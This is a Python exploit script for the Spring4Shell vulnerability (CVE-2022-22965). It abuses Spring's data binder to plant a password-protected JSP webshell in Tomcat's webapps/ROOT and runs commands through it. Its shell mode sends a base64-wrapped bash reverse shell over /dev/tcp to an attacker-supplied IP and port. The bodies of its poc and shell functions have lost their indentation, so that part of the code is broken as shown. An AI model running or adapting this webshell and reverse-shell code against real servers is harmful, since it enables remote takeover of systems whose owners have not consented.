# CVE-2022-22965 (Spring4Shell): Spring Framework remote code execution — drops a JSP webshell by
# redirecting Tomcat's access-log valve into webapps/ROOT via the data-binder class-loader bug.
import requests
import argparse
import time
import re
import base64
import urllib.parse
# Browser-looking User-Agent shared by both header sets below.
_BROWSER_UA = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
)

# Headers for the request that rewrites the access-log pattern.  The last
# three are not HTTP noise: the injected log pattern references them as
# %{c2}i, %{c1}i and %{suffix}i (request-header lookups), so the valve
# substitutes "<%", "Runtime" and "%>//" into the log line that becomes the
# JSP -- presumably to keep the scriptlet delimiters out of the query string.
header: dict[str, str] = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": _BROWSER_UA,
    "Connection": "close",
    "suffix": "%>//",
    "c1": "Runtime",
    "c2": "<%",
    "DNT": "1",
}

# Plain headers used when talking to the dropped webshell.
header1: dict[str, str] = {"User-Agent": _BROWSER_UA}
def poc(ip, cmd):
payload = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
cmd1 = cmd.encode('utf-8')
cmd2 = urllib.parse.quote(cmd1)
payload1 = "/tomcatwar.jsp?pwd=j&cmd=" + cmd2
payload2 = "/tomcatwar.jsp"
ceshi = requests.get(url=ip + payload2)
if ceshi.status_code != 200:
rizhi = requests.get(url=ip + payload, headers=header)
if rizhi.status_code ==200:
time.sleep(10)
ruslut = requests.get(url=ip + payload1,headers=header1,verify=False)
c = ruslut.text
a = c.split('//')
print(a[0])
print('无CVE-2022-22965漏洞')
else:
ruslut = requests.get(url=ip + payload1,headers=header1,verify=False)
c = ruslut.text
a=c.split('//')
print(a[0])
def shell(url,ip,prot):
ul="/tomcatwar.jsp?pwd=j&cmd="
sh=f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
data1 = sh.encode('utf-8')
encoded_data = base64.b64encode(data1)
encoded_sh = encoded_data.decode('utf-8')
shel='bash -c {echo,123}|{base64,-d}|{bash,-i}'
new_text = shel.replace("123", encoded_sh)
data = new_text.encode('utf-8')
encoded_shell = urllib.parse.quote(data)
payload = url+ul+encoded_shell
print(payload)
c=requests.get(url=payload,headers=header1,verify=False)
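def main() -> None:
    """Command-line entry point.

    ``-u`` alone runs a single command through ``poc`` (default ``pwd``);
    ``-u`` together with ``-i`` and ``-p`` fires the reverse shell via
    ``shell``.  Giving only one of ``-i``/``-p`` is now a usage error rather
    than silently falling back to the command mode, and ``-p`` is parsed as an
    integer so a bad port fails here instead of on the target.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', dest='url', help="输入url")
    parser.add_argument('-c', '--cmd', dest='cmd', default='pwd', help='输入命令(执行带参数的命令将参数双引起来)')
    parser.add_argument('-i', '--ip', dest='ip', help='输入反弹ip')
    parser.add_argument('-p', '--prot', dest='prot', type=int, help='输入反弹端口')
    parser.add_argument('-V', '--version', action='version', version='%(prog)s 1.0')
    args = parser.parse_args()

    if not args.url:
        parser.print_help()
        return
    # Reverse-shell mode needs both halves of the listener address.
    if (args.ip is None) != (args.prot is None):
        parser.error("-i/--ip and -p/--prot must be given together")
    if args.ip is not None:
        shell(args.url, args.ip, args.prot)
    else:
        poc(args.url, args.cmd)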
# Script entry point; importing the module only defines the exploit helpers
# and sends nothing.
if __name__ == '__main__':
    main()